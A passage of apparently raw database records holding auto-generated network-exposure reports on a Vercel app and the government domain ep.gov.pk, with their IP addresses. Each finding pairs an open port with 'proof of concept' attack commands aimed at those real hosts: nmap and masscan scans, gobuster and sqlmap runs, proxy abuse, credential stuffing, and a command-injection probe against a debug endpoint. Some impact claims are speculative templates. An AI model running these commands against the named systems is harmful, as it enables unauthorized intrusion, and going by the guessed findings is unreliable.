Scenario (Proof of Concept)** \nAn attacker issues a simple HTTP request:\n\n```bash\ncurl -v http://64.29.17.3/\n```\n\nThey examine headers and body content for signs of redirection behavior, cookie handling, or server-side errors that reveal system internals.\n\n**Business Impact** \nInsecure HTTP services undermine trust and violate best practices around encrypted communication. They remain targets for passive surveillance and active tampering.\n\n---\n\n### Open Port 443/tcp on 64.29.17.3\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.3 |\n\n**Description** \nPort 443/tcp is open on 64.29.17.3, confirming that a TLS-enabled web service is present. This is expected for modern websites; however, the actual security posture depends on proper TLS configuration and backend hardening.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker uses `nmap` to inspect supported protocols:\n\n```bash\nnmap --script ssl-enum-ciphers -p443 64.29.17.3\n```\n\nThey also attempt to retrieve the certificate chain:\n\n```bash\necho | openssl s_client -showcerts -connect 64.29.17.3:443\n```\n\nWeak ciphers or self-signed certificates may indicate poor security hygiene.\n\n**Business Impact** \nPoorly managed TLS implementations erode customer confidence and expose the organization to decryption risks, especially in regulated industries requiring robust encryption standards.\n\n---\n\n### Open Port 80/tcp (HTTP) – Vercel Service on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description** \nPort 80/tcp is open and identified as serving HTTP traffic from a Vercel-hosted application. Although Vercel generally enforces automatic HTTPS redirection, the availability of plaintext HTTP remains a concern unless explicitly disabled or redirected.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker accesses the site over HTTP:\n\n```bash\ncurl -I http://cp-club-vjti.vercel.app/\n```\n\nThey verify whether the platform automatically redirects to HTTPS. If not, they may attempt to intercept traffic or exploit browser behaviors related to mixed-content policies.\n\n**Business Impact** \nAllowing cleartext HTTP access undermines end-user privacy and violates industry expectations regarding secure web delivery. It may result in warnings from browsers or rejection by compliance auditors.\n\n---\n\n### Open Port 443/tcp (HTTPS) – Golang net/http Server on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description** \nPort 443/tcp serves HTTPS traffic powered by a Go-based HTTP server (`net/http`). While functional, default implementations of this library do not include hardened defaults for security headers or rate limiting, potentially exposing subtle weaknesses.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker inspects HTTP headers returned by the server:\n\n```bash\ncurl -I https://cp-club-vjti.vercel.app/\n```\n\nMissing headers like `Strict-Transport-Security`, `X-Content-Type-Options`, or `Content-Security-Policy` suggest inadequate protection against common web threats such as XSS or clickjacking.\n\n**Business Impact** \nLack of defensive HTTP headers exposes users to client-side attacks and reduces resilience against phishing or malicious script injection attempts.\n\n---\n\n### Open Port 8008/tcp (HTTP) on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description** \nPort 8008/tcp is open and responding to HTTP requests on the domain cp-club-vjti.vercel.app. This non-standard port may serve auxiliary functions or development APIs, increasing the overall attack surface unnecessarily.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker queries the endpoint directly:\n\n```bash\ncurl http://cp-club-vjti.vercel.app:8008/\n```\n\nThey search for API documentation, debug interfaces, or internal routing logic that shouldn’t be exposed externally.\n\n**Business Impact** \nExposing alternate HTTP ports without explicit purpose introduces complexity into perimeter defense strategies and raises the likelihood of misconfiguration leading to unauthorized access.\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy) – FortiGuard Web Filtering on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description** \nPort 8015/tcp operates as an HTTP proxy identified as FortiGuard Web Filtering. Proxies exposed to public internet increase risk of misuse for tunneling traffic or bypassing controls. Their presence requires careful review of access restrictions and logging capabilities.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker tests proxy connectivity:\n\n```bash\ncurl --proxy http://cp-club-vjti.vercel.app:8015 http://example.com\n```\n\nIf successful, they can route arbitrary traffic through the proxy, potentially masking their identity or evading detection systems.\n\n**Business Impact** \nPublicly accessible proxies facilitate abuse by adversaries seeking anonymity or attempting to circumvent corporate firewalls. They represent both a reputational liability and a direct security threat.\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy) – FortiGuard Web Filtering on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description** \nSimilar to port 8015, port 8020/tcp runs an HTTP proxy leveraging FortiGuard Web Filtering technology. Public accessibility of such infrastructure poses similar risks of unauthorized usage and abuse.\n\n**Attack Scenario (Proof of Concept)** \nThe attacker configures a browser or tool to utilize the proxy:\n\n```bash\nexport http_proxy=http://cp-club-vjti.vercel.app:8020\ncurl http://ifconfig.me\n```\n\nSuccessful execution confirms the proxy accepts external traffic, enabling anonymized browsing or evasion of geolocation filters.\n\n**Business Impact** \nUnrestricted proxy access invites exploitation for illicit activities, including spam distribution, malware propagation, or circumvention of regional content restrictions.\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.6 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description** \nThe domain cp-club-vjti.vercel.app appears on the DNS-based blacklist `list.quorum.to` categorized as SPAM. This listing may stem from historical abuse, shared hosting reputation, or misclassified legitimate activity. Regardless of cause, blacklisting affects deliverability and credibility.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker checks the domain’s reputation using online tools or DNSBL lookup utilities:\n\n```bash\ndig +short TXT 64.29.17.3.list.quorum.to\n```\n\nA positive match confirms the listing. Malicious actors may leverage this knowledge to justify targeting emails sent from the domain or discounting alerts originating from affected IPs.\n\n**Business Impact** \nBlacklisted domains suffer reduced email deliverability, damaged brand perception, and increased scrutiny from security vendors. Remediation involves contacting the blacklist maintainer and addressing root causes of the listing.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a142b46ba5c57127fc7b8ac"},"created_at":{"$date":"2026-05-25T10:58:14.535Z"},"url":"https://ep.gov.pk/","tool":"generate_network_exposure_report","result":{"url":"https://ep.gov.pk/","category":"network_exposure","timestamp":"2026-05-25T10:58:14.528221+00:00","report":"### Open Port 8020/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8020/tcp is open on the host at IP address `124.109.52.82`. This port is commonly associated with HTTP proxy services or custom web applications. The exposure of such ports can indicate that internal or intermediary systems are accessible from external networks without proper access controls.\n\nAn attacker may identify this open port using standard reconnaissance tools like Nmap or Masscan during initial enumeration phases. If the service running behind the port is misconfigured or lacks authentication mechanisms, it could expose sensitive functionality or act as a pivot point into deeper infrastructure layers.\n\n**Attack Scenario (Proof of Concept)** \n1. An attacker performs a SYN scan against the target IP:\n ```bash\n nmap -p 8020 124.109.52.82\n ```\n2. Upon confirming the port is open, they attempt to connect via browser or curl:\n ```bash\n curl http://124.109.52.82:8020/\n ```\n3. Depending on response headers or content returned, further fingerprinting can reveal software versions or configuration weaknesses.\n4. If acting as an HTTP proxy, the attacker might try sending requests through it:\n ```bash\n curl --proxy http://124.109.52.82:8020 http://internal-service.local/admin\n ```\n\nIf successful, unauthorized access to internal resources or bypassing perimeter defenses becomes possible.\n\n**Business Impact** \nWhile not inherently exploitable by itself, exposing non-standard ports increases the attack surface and provides additional vectors for exploitation if other vulnerabilities exist within the service. It also raises concerns about insecure configurations or lack of segmentation between public-facing and internal systems.\n\n---\n\n### Open Port 8015/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nTCP port 8015 is open on the system located at `124.109.52.82`. This port often serves as an alternative HTTP port used by proxies, application servers, or development environments. Its presence indicates potential exposure of backend or auxiliary services directly reachable over the internet.\n\nAttackers typically discover such ports through full-range TCP scans (`nmap -p-`) or targeted scanning of known alternate HTTP ports. If left unhardened, these endpoints can leak information or provide unintended access paths.\n\n**Attack Scenario (Proof of Concept)** \n1. Perform a detailed scan to confirm service details:\n ```bash\n nmap -sV -p 8015 124.109.52.82\n ```\n2. Connect to the endpoint:\n ```bash\n curl http://124.109.52.82:8015/\n ```\n3. Analyze server headers and body for clues about underlying technology or internal routing rules.\n4. Attempt to use the service as a forward proxy or test for SSRF vulnerabilities if applicable.\n\nIn some cases, poorly configured reverse proxies or API gateways listening on this port may allow lateral movement or unauthorized resource access.\n\n**Business Impact** \nExposing auxiliary HTTP ports increases risk due to expanded visibility of internal architecture. Even benign-looking services can become entry points when combined with other flaws such as weak authentication or outdated components.\n\n---\n\n### Open Port 8008/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8008/tcp is open on the asset `124.109.52.82`, which is frequently used for alternative HTTP services, including embedded devices, IoT appliances, or lightweight web interfaces. These types of services are often overlooked in hardening procedures and may retain default credentials or debug features enabled.\n\nSuch ports are easily discovered through routine port scanning techniques and represent low-hanging fruit for attackers seeking quick wins or footholds inside a network.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan the target:\n ```bash\n masscan 124.109.52.82 -p 8008\n ```\n2. Access the service:\n ```bash\n curl http://124.109.52.82:8008/\n ```\n3. Inspect responses for banners, login prompts, or diagnostic output.\n4. Try common default credentials or brute-force attacks if authentication is present.\n\nIf the device has administrative functions exposed, compromise could lead to persistent control or data exfiltration.\n\n**Business Impact** \nUnmanaged exposure of alternate HTTP ports poses risks related to unauthorized access, especially if legacy or vendor-default settings remain active. In worst-case scenarios, attackers gain direct control over critical infrastructure components.\n\n---\n\n### Open Port 80/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nStandard HTTP port 80 is open on the IP address `124.109.52.82`. While expected behavior for publicly hosted websites, improper configuration or outdated software can introduce significant security gaps. Services running here should be hardened and monitored continuously.\n\nThis port is universally scanned by adversaries and automated scanners alike, making it a primary focus area for both legitimate traffic handling and malicious probing.\n\n**Attack Scenario (Proof of Concept)** \n1. Identify the service version:\n ```bash\n nmap -sV -p 80 124.109.52.82\n ```\n2. Request homepage:\n ```bash\n curl http://124.109.52.82/\n ```\n3. Enumerate directories or files:\n ```bash\n gobuster dir -u http://124.109.52.82 -w /usr/share/wordlists/dirb/common.txt\n ```\n4. Test for vulnerabilities based on identified technologies (e.g., SQL injection, XSS).\n\nA vulnerable web application on this port could result in full system compromise depending on backend integrations.\n\n**Business Impact** \nPublicly accessible HTTP services increase organizational exposure to web-based threats. Without adequate protection measures, breaches originating from this interface can escalate rapidly into broader infrastructural compromises.\n\n---\n\n### Open Port 443/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nHTTPS port 443 is open on `124.109.52.82`, indicating encrypted communication support. However, merely having TLS does not guarantee secure implementation; certificate validity, cipher strength, protocol versions, and renegotiation settings all play crucial roles in determining actual security posture.\n\nAdversaries will inspect SSL/TLS configurations to find downgrade opportunities or exploit deprecated protocols still in use.\n\n**Attack Scenario (Proof of Concept)** \n1. Check supported ciphers and protocols:\n ```bash\n sslscan https://124.109.52.82\n ```\n2. Validate certificate chain integrity:\n ```bash\n openssl s_client -connect 124.109.52.82:443\n ```\n3. Attempt man-in-the-middle attacks leveraging weak encryption suites or expired certificates.\n4. Exploit protocol downgrade vulnerabilities if older SSL versions are accepted.\n\nMisconfigurations here can undermine user trust and enable interception of sensitive communications.\n\n**Business Impact** \nImproper TLS setup undermines confidentiality guarantees essential for secure transactions. Regulatory compliance failures and customer distrust follow suit, particularly in sectors requiring high assurance levels.\n\n---\n\n### Open Port 80/tcp (http) — Microsoft-HTTPAPI/2.0 on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nThe domain `ep.gov.pk` exposes port 80 running Microsoft HTTP API v2.0, a kernel-mode driver providing basic HTTP capabilities for Windows-based applications. Commonly seen in IIS setups or self-hosted .NET services, this service may lack robust logging or input sanitization unless explicitly configured otherwise.\n\nAttackers recognize this signature quickly and tailor their approach accordingly—especially targeting known CVEs affecting specific builds of the component.\n\n**Attack Scenario (Proof of Concept)** \n1. Confirm service identity:\n ```bash\n curl -I http://ep.gov.pk\n # Server: Microsoft-HTTPAPI/2.0\n ```\n2. Probe for directory traversal or verb tampering:\n ```bash\n curl -X TRACE http://ep.gov.pk/\n ```\n3. Attempt buffer overflow exploits if vulnerable versions are detected.\n4. Combine findings with other exposed endpoints for escalation possibilities.\n\nExploitation depends heavily on patch level and whether additional protections like WAFs are in place.\n\n**Business Impact** \nUse of generic Microsoft HTTP APIs without sufficient hardening leaves organizations susceptible to well-documented remote code execution flaws tied to older releases. Public availability amplifies impact significantly.\n\n---\n\n### Open Port 443/tcp (tcpwrapped) on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nPort 443 on `ep.gov.pk` returns a \"tcpwrapped\" state, suggesting that connections are filtered or intercepted before reaching the intended service. This usually implies the presence of a firewall, load balancer, or intrusion prevention system performing deep packet inspection or connection throttling.\n\nAlthough this reduces direct exposure, it doesn’t eliminate underlying risks entirely. Misconfigured wrappers can still leak metadata or respond inconsistently under stress conditions.\n\n**Attack Scenario (Proof of Concept)** \n1. Observe inconsistent behavior across multiple requests:\n ```bash\n while true; do nc -zv ep.gov.pk 443; sleep 1; done\n ```\n2. Send malformed packets to trigger different wrapper responses:\n ```bash\n hping3 -c 10 -S -p 443 ep.gov.pk\n ```\n3. Monitor timing differences or error messages that hint at internal topology or filtering logic.\n\nAdvanced adversaries may deduce internal structures even behind wrapped ports.\n\n**Business Impact** \nWhile tcpwrapping adds a layer of obscurity, it introduces complexity that can degrade performance or create false positives/negatives in monitoring systems. Poorly implemented wrappers may inadvertently disclose more than intended.\n\n---\n\n### Open Port 8008/tcp (http) on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nAlternative HTTP port 8008 is accessible on `ep.gov.pk`. As previously noted, such ports often serve auxiliary functions and may not undergo the same scrutiny applied to standard web ports. They're attractive targets because they’re less likely to be included in baseline security policies.\n\nReconnaissance tools readily detect these ports, enabling attackers to map out extended attack surfaces beyond traditional web interfaces.\n\n**Attack Scenario (Proof of Concept)** \n1. Scan for open ports:\n ```bash\n nmap -p 8000-9000 ep.gov.pk\n ```\n2. Connect to the service:\n ```bash\n curl http://ep.gov.pk:8008/\n ```\n3. Look for banners, redirects, or debug pages indicating internal usage.\n4. Attempt to abuse any exposed APIs or undocumented features.\n\nDepending on purpose, this port may grant access to staging areas, management consoles, or internal dashboards.\n\n**Business Impact** \nExposing non-standard HTTP ports widens the organization’s digital footprint unnecessarily. Each new endpoint increases maintenance overhead and potential breach points, especially if deployed hastily without proper oversight.\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nPort 8015 on `ep.gov.pk` runs Fortinet's FortiGuard Web Filtering service, typically deployed as part of enterprise-grade firewalls or secure web gateways. Although designed to enforce policy compliance, exposing such services externally creates risks around misconfiguration or bypass attempts.\n\nAttackers familiar with Fortinet products may attempt to exploit known vulnerabilities or probe for default credentials, especially if the instance hasn't been updated regularly.\n\n**Attack Scenario (Proof of Concept)** \n1. Identify product version:\n ```bash\n curl -I http://ep.gov.pk:8015\n ```\n2. Search for default login portals:\n ```bash\n curl http://ep.gov.pk:8015/login\n ```\n3. Attempt credential stuffing or dictionary attacks if authentication is enforced.\n4. Investigate whether proxy chaining is allowed:\n ```bash\n curl --proxy http://ep.gov.pk:8015 http://google.com\n ```\n\nSuccessful misuse could allow unrestricted outbound browsing or tunneling of malicious traffic.\n\n**Business Impact** \nExternal accessibility of filtering/proxy services presents dual risks: either becoming compromised themselves or being abused to facilitate secondary attacks. Both outcomes carry serious implications regarding regulatory adherence and operational continuity.\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nSimilar to port 8015, port 8020 hosts another instance of Fortinet’s FortiGuard Web Filtering solution. Multiple instances suggest redundancy or multi-tiered deployment strategies but also multiply the number of potential ingress points for attackers.\n\nEach exposed proxy increases complexity in managing consistent security postures and requires vigilant patching schedules to avoid exploitation of shared vulnerabilities.\n\n**Attack Scenario (Proof of Concept)** \n1. Verify service type:\n ```bash\n curl -I http://ep.gov.pk:8020\n ```\n2. Explore available endpoints:\n ```bash\n curl http://ep.gov.pk:8020/status\n ```\n3. Test proxy functionality:\n ```bash\n curl --proxy http://ep.gov.pk:8020 http://internal-api.corp/data\n ```\n4. Attempt privilege escalation or lateral movement if internal access is achieved.\n\nCompromise of one proxy node can cascade into broader network infiltration given sufficient permissions.\n\n**Business Impact** \nMultiple exposed proxy nodes complicate incident detection and remediation efforts. Any single node failure or compromise affects overall resilience and potentially grants adversaries unfettered access to protected segments.","summary":{"total":10}},"summary":{"total":10}},{"_id":{"$oid":"6a155da4ecafc28a4bf6e8ef"},"created_at":{"$date":"2026-05-26T08:45:24.056Z"},"url":"https://ep.gov.pk/","tool":"generate_network_exposure_report","result":{"url":"https://ep.gov.pk/","category":"network_exposure","timestamp":"2026-05-26T08:45:24.046822+00:00","report":"### Open Port 8020/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8020/tcp is open on the IP address `124.109.52.82`. This port typically does not have a standardized use but may be used by custom applications, proxy services, or internal web interfaces. The exposure of such ports can indicate misconfigurations or unnecessary services running without proper access controls.\n\nAn attacker would identify this using standard port scanning tools like Nmap or Masscan to enumerate all open TCP ports across the target system. If further fingerprinting reveals that this port serves HTTP traffic or acts as a proxy, it becomes a potential entry point for reconnaissance or exploitation.\n\n**Attack Scenario (Proof of Concept)** \n1. An attacker performs a full TCP SYN scan against `124.109.52.82`:\n ```bash\n nmap -p- 124.109.52.82\n ```\n2. Upon discovering port 8020 is open, they attempt banner grabbing:\n ```bash\n nc -v 124.109.52.82 8020\n GET / HTTP/1.1\n Host: 124.109.52.82\n ```\n3. If the response indicates an HTTP-based service or proxy behavior, the attacker might explore directory traversal, authentication bypasses, or known vulnerabilities specific to the software stack behind the port.\n\n**Business Impact** \nWhile this finding alone poses minimal risk, exposing non-standard ports increases the attack surface unnecessarily. It may lead to unauthorized access if the underlying service has weak configurations or unpatched flaws. Additionally, regulatory auditors often flag exposed administrative or development endpoints during compliance reviews.\n\n---\n\n### Open Port 8015/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8015/tcp is open on the host at `124.109.52.82`. Like other high-numbered ports, it's commonly used for application-specific purposes such as reverse proxies, API gateways, or internal dashboards. Its presence suggests either intentional configuration or accidental exposure due to lack of firewall rules.\n\nAttackers routinely scan for these types of ports since they are less likely to be monitored closely compared to well-known ports like 80 or 443. Identification involves basic port scanning followed by service detection via banners or protocol negotiation attempts.\n\n**Attack Scenario (Proof of Concept)** \n1. A scanner identifies port 8015 as open:\n ```bash\n masscan 124.109.52.82 -p8015\n ```\n2. Using Nmap for deeper inspection:\n ```bash\n nmap -sV -p8015 124.109.52.82\n ```\n3. If identified as an HTTP proxy (e.g., FortiGuard), attackers may test for bypass techniques or abuse it for anonymized requests:\n ```bash\n curl --proxy http://124.109.52.82:8015 http://internal-service.local/admin\n ```\n\n**Business Impact** \nExposing internal-facing infrastructure through public proxies can allow lateral movement within the organization’s network. Even if benign, such exposures increase operational complexity and audit risks, especially when tied to third-party filtering appliances like Fortinet products which require strict segmentation policies.\n\n---\n\n### Open Port 8008/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 8008/tcp is open on the asset `124.109.52.82`. Historically associated with alternative HTTP servers or embedded device interfaces, this port should only be accessible internally unless explicitly required for external communication. Its visibility externally raises concerns about improper network zoning or insecure default configurations.\n\nAttackers will probe this port after initial discovery to determine whether it hosts a vulnerable web server, debug interface, or management console.\n\n**Attack Scenario (Proof of Concept)** \n1. Initial scan discovers the port:\n ```bash\n nmap -p8008 124.109.52.82\n ```\n2. Service enumeration shows it's serving HTTP content:\n ```bash\n curl http://124.109.52.82:8008/\n ```\n3. Further exploration could reveal sensitive directories or endpoints:\n ```bash\n gobuster dir -u http://124.109.52.82:8008/ -w /usr/share/wordlists/dirb/common.txt\n ```\n\n**Business Impact** \nIf this port exposes administrative functionality or debugging features, it could enable privilege escalation or information disclosure. Even if harmless, its exposure contributes to an expanded attack surface and violates defense-in-depth principles.\n\n---\n\n### Open Port 80/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nThe standard HTTP port (80/tcp) is open on `124.109.52.82`, indicating that a web server is actively listening for incoming connections. While expected for publicly hosted websites, the absence of TLS encryption makes communications susceptible to interception and manipulation.\n\nThis port was accessed under the context of the domain `https://ep.gov.pk/`, suggesting that the IP hosts multiple services or virtual hosts. Attackers typically begin their reconnaissance here, leveraging automated scanners to detect outdated CMS versions, misconfigured headers, or exposed backend paths.\n\n**Attack Scenario (Proof of Concept)** \n1. Confirm accessibility:\n ```bash\n curl http://124.109.52.82\n ```\n2. Enumerate subdirectories:\n ```bash\n dirsearch -u http://124.109.52.82\n ```\n3. Test for common vulnerabilities such as XSS or SQL injection:\n ```bash\n sqlmap -u \"http://124.109.52.82/search?q=test\" --batch\n ```\n\n**Business Impact** \nHosting plaintext HTTP services increases the likelihood of credential theft, session hijacking, and man-in-the-middle attacks. Organizations relying solely on HTTP also face SEO penalties from search engines and reduced trust from users who expect secure browsing experiences.\n\n---\n\n### Open Port 443/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description** \nPort 443/tcp is open on `124.109.52.82`, signifying that HTTPS traffic is accepted. However, upon closer inspection, the service appears to be wrapped in a TCP wrapper (`tcpwrapped`) rather than directly exposing a TLS-enabled web server. This implies that some form of middleware or filtering appliance intercepts SSL/TLS handshakes before forwarding them to another destination.\n\nSuch setups are common in enterprise environments where firewalls or load balancers perform SSL termination. Misconfigurations in these layers can result in certificate mismatches, expired certificates, or even cleartext logging of encrypted sessions.\n\n**Attack Scenario (Proof of Concept)** \n1. Connect to the port:\n ```bash\n openssl s_client -connect 124.109.52.82:443\n ```\n2. Observe handshake failure or redirection behavior:\n ```text\n CONNECTED(00000003)\n write:errno=104\n ```\n3. Attempt direct HTTP over TLS:\n ```bash\n curl -k https://124.109.52.82\n ```\n\n**Business Impact** \nImproperly configured SSL termination points introduce significant security gaps including downgrade attacks, certificate validation bypasses, and exposure of sensitive data in transit. These issues undermine user confidence and expose the organization to legal liabilities related to privacy breaches.\n\n---\n\n### Open Port 80/tcp (http) — Microsoft-HTTPAPI/2.0 on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nPort 80/tcp on `ep.gov.pk` is running Microsoft HTTP API version 2.0, a lightweight kernel-mode driver used by Windows systems to serve HTTP content. Commonly found in IIS Express instances, WCF services, or self-hosted .NET applications, this setup lacks many protections offered by full-fledged web servers.\n\nExposed Microsoft-HTTPAPI endpoints are frequently targeted because they often run with elevated privileges and may contain debugging artifacts or developer backdoors left enabled in production.\n\n**Attack Scenario (Proof of Concept)** \n1. Identify the service:\n ```bash\n nmap -sV -p80 ep.gov.pk\n ```\n2. Probe for known routes or metadata:\n ```bash\n curl http://ep.gov.pk/api/metadata\n ```\n3. Exploit weak authentication mechanisms:\n ```bash\n curl -X POST http://ep.gov.pk/api/debug --data '{\"cmd\":\"whoami\"}'\n ```\n\n**Business Impact** \nRunning raw Microsoft HTTP APIs in production introduces substantial risk due to limited logging capabilities, poor error handling, and frequent exposure of diagnostic endpoints. Compromise of such services can lead to remote code execution, data exfiltration, or persistent footholds inside the network perimeter.\n\n---\n\n### Open Port 443/tcp (tcpwrapped) on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nPort 443/tcp on `ep.gov.pk` returns a `tcpwrapped` response, meaning that while the port accepts connections, actual service availability depends on additional logic implemented by a wrapping daemon—typically libwrap or similar access control frameworks.\n\nThis pattern usually occurs when a reverse proxy, IDS/IPS, or application-level gateway filters incoming traffic based on source IPs, rate limits, or protocol anomalies. Although this adds a layer of obfuscation, it doesn't inherently protect against determined adversaries capable of probing beyond superficial defenses.\n\n**Attack Scenario (Proof of Concept)** \n1. Establish connection:\n ```bash\n telnet ep.gov.pk 443\n ```\n2. Send malformed TLS ClientHello packet:\n ```bash\n echo -ne '\\x16\\x03\\x01\\x00\\x01\\x01' | nc ep.gov.pk 443\n ```\n3. Analyze responses to infer filtering behavior or bypass conditions.\n\n**Business Impact** \nRelying on tcpwrappers instead of robust perimeter security creates false confidence among administrators. Sophisticated attackers can circumvent simple wrappers using evasion tactics, potentially gaining access to otherwise protected resources.\n\n---\n\n### Open Port 8008/tcp (http) on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description** \nPort 8008/tcp on `ep.gov.pk` is serving HTTP traffic. As previously noted, this port is not reserved for any particular purpose and is often repurposed for alternate web interfaces, development servers, or legacy applications.\n\nGiven that both standard and non-standard HTTP ports exist 